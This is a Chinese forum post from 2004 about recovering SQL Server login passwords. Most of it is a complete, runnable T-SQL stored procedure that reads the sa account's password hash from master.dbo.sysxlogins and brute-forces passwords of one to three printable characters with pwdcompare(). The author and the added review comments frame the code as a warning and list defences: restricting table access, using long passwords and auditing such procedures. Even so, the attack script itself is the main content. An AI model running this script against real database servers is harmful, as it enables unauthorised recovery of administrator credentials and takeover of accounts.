关于 SQL Server sa 密码破解的一种方法,抛砖引玉,请高手们讨论!
老宛 2004-08-06 02:45:36 呵呵,涉及到sql server的安全性,兄弟们要注意了
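小弟最近在 sp_addlogin 存储过程中发现了 SQL Server 加密密码的函数 pwdencrypt(),又在 sp_password 存储过程中发现了口令比较的函数 pwdcompare()。密码虽然是单向加密(散列)保存的,但只要能读到 master.dbo.sysxlogins 表里保存的密文(下面的存储过程就是这样做的),就能用 pwdcompare() 通过穷举猜到 sa 的密码,当然其他登录帐户的密码也是可以猜到的。因此要限制对该表的访问,而且密码越短越容易被猜中,sa 要使用足够长、足够复杂的密码。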
-- Remove any earlier copy of the procedure from the current database so the
-- CREATE PROCEDURE batch that follows can be re-run without an
-- "object already exists" error.
IF EXISTS (
    SELECT 1
    FROM sysobjects AS so
    WHERE so.type = 'P'                 -- 'P' = stored procedure
      AND so.name = N'sp_get_password'
)
BEGIN
    DROP PROCEDURE sp_get_password
END
GO
-- Test procedure that looks up the stored password hash of a login and tries
-- to recover the clear-text password by exhaustive search. As written it only
-- covers passwords of 1 to 3 characters.
--
-- Parameter:
--   @username  login name to check; defaults to 'sa'.
-- Result set (column aliases are Chinese: 用户名 = user name, 密码 = password):
--   one row with the login name and either the matching password,
--   '没密码' ("no password") or '没有找到' ("not found").
--
-- Candidate characters are CHAR(33) .. CHAR(126), i.e. the 94 printable ASCII
-- characters without the space. The full search is therefore at most
-- 94 + 94^2 + 94^3 = 839,514 pwdcompare() calls, which is why a short
-- password gives no protection once its hash can be read.
--
-- NOTE(review): reading [password] from master.dbo.sysxlogins presumably
-- requires sysadmin-level access on the instance; confirm for the version in
-- use. Defensive takeaways: keep access to that table restricted, require
-- long passwords for sa and every other SQL login, and treat the creation of
-- procedures that reference pwdcompare() or sysxlogins as an event worth
-- auditing.
CREATE PROCEDURE sp_get_password
@username varchar(255)='sa'
AS
-- @EncryptedPWD holds the stored hash, @password the current candidate.
DECLARE @EncryptedPWD varbinary(255),@password varchar(255)
set @EncryptedPWD=null
-- Fetch the stored hash for the requested login.
SELECT @EncryptedPWD=[password] FROM [master].[dbo].[sysxlogins]
where [name]=@username
-- A NULL here means either that no row matched @username or that the row has
-- a NULL password column; the code does not distinguish the two and reports
-- '没密码' ("no password") in both cases.
IF @EncryptedPWD is null
BEGIN
SELECT @USERNAME AS 用户名,'没密码' AS 密码
RETURN
END
-- Loop counters, one per password position. Only @I1..@I3 are used below;
-- @I4..@I10 and @J are declared but never referenced in this procedure.
DECLARE @I1 INT
DECLARE @I2 INT
DECLARE @I3 INT
DECLARE @I4 INT
DECLARE @I5 INT
DECLARE @I6 INT
DECLARE @I7 INT
DECLARE @I8 INT
DECLARE @I9 INT
DECLARE @I10 INT
DECLARE @J INT
-- Pass 1: one-character passwords.
SET @I1=33
WHILE @I1<127
BEGIN
SELECT @password=CHAR(@I1)
-- pwdcompare() returns 1 when the clear text matches the stored hash.
-- NOTE(review): the third argument 0 presumably means "not a hash migrated
-- from a pre-2000 login"; confirm against the documentation of the version
-- in use.
IF pwdcompare(@password, @EncryptedPWD, 0)=1
BEGIN
-- Match: return the login and the recovered password, then stop.
SELECT @username as '用户名',@PASSWORD as '密码'
RETURN
END
SELECT @I1=@I1+1
END
-- Progress marker: every one-character candidate was tried without a match.
print '1'
-- Pass 2: two-character passwords (@I2 = first character, @I1 = second).
SET @I2=33
WHILE @I2<127
BEGIN
SET @I1=33
WHILE @I1<127
BEGIN
SELECT @password=CHAR(@I2)+CHAR(@I1)
IF pwdcompare(@password, @EncryptedPWD, 0)=1
BEGIN
SELECT @username as '用户名',@PASSWORD as '密码'
RETURN
END
SELECT @I1=@I1+1
END
SELECT @I2=@I2+1
END
-- Progress marker: every two-character candidate was tried without a match.
PRINT '2'
-- Pass 3: three-character passwords (@I3, @I2, @I1 = first, second, third).
SET @I3=33
WHILE @I3<127
BEGIN
SET @I2=33
WHILE @I2<127
BEGIN
SET @I1=33
WHILE @I1<127
BEGIN
SELECT @password=CHAR(@I3)+CHAR(@I2)+CHAR(@I1)
IF pwdcompare(@password, @EncryptedPWD, 0)=1
BEGIN
SELECT @username as '用户名',@PASSWORD as '密码'
RETURN
END
SELECT @I1=@I1+1
END
SELECT @I2=@I2+1
END
SELECT @I3=@I3+1
END
-- Progress marker: every three-character candidate was tried without a match.
PRINT '3'
-- No candidate matched: the password is longer than 3 characters or contains
-- a character outside CHAR(33)..CHAR(126). '没有找到' = "not found".
SELECT @username as '用户名','没有找到' as '密码'
GO
-- Usage example: called without an argument, the procedure checks the
-- default login 'sa'.
sp_get_password
-- To check another login, pass its name instead:
--sp_get_password 'zj'